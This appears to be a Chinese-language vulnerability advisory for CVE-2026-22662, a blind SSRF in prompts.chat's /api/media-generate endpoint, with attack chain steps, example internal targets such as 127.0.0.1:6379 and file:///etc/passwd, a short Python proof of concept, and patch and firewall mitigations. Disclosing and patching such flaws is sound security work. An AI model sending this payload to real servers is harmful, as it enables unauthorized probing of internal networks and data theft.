CVE-2026-22662 CVSS 4.3 中危

CVE-2026-22662 prompts.chat盲SSRF漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22662

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

prompts.chat

漏洞概述

prompts.chat在特定版本前存在盲SSRF漏洞。由于Wiro media generator未正确验证用户输入，经过身份验证的攻击者可利用`/api/media-generate`端点中的`inputImageUrl`参数，诱导服务器向内网发起请求。攻击者可借此探测内部网络结构、访问内部服务或窃取数据，且由于是盲注，攻击者无法直接获取响应内容。

技术细节

该漏洞源于prompts.chat集成的Wiro media generator功能未对用户输入的`inputImageUrl`参数实施严格的服务器端校验。当应用程序处理发送至`/api/media-generate`接口的POST请求时，会直接将用户提供的参数值作为目标地址发起HTTP请求。攻击者仅需具备低权限账号，即可构造特定的Payload，将URL指向内网敏感资源（如`http://127.0.0.1:6379`或`file:///etc/passwd`）。由于漏洞被定义为盲SSRF，攻击者无法直接从服务器获取响应内容，但利用时间延迟差异或配合DNS外带平台，仍可推断内网端口开放状态及服务类型，进而探测内部网络拓扑并窃取敏感数据，对内网安全构成严重威胁。

攻击链分析

STEP 1

1. 获取凭证

攻击者注册或获取一个低权限的prompts.chat账户认证令牌。

STEP 2

2. 构造Payload

攻击者构造POST请求，将`inputImageUrl`参数设置为内网目标地址（如127.0.0.1）。

STEP 3

3. 发起盲注

向`/api/media-generate`端点发送请求，服务器端代为请求内网资源。

STEP 4

4. 结果推断

通过响应时间差异或DNS外带记录判断内网服务是否存在及端口开放情况。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = "http://victim.com/api/media-generate"
internal_url = "http://127.0.0.1:8080/admin"
headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <attacker_token>"
}
data = {"inputImageUrl": internal_url}

# Send blind SSRF payload
r = requests.post(target, json=data, headers=headers)
print(f"Request sent with status: {r.status_code}")

影响范围

prompts.chat < commit 1464475

防御指南

临时缓解措施

建议立即应用官方补丁（commit 1464475）。在无法立即升级的情况下，应严格限制对`/api/media-generate`接口的访问权限，并在服务器防火墙层面阻断应用服务器向内网敏感网段的非必要出站连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表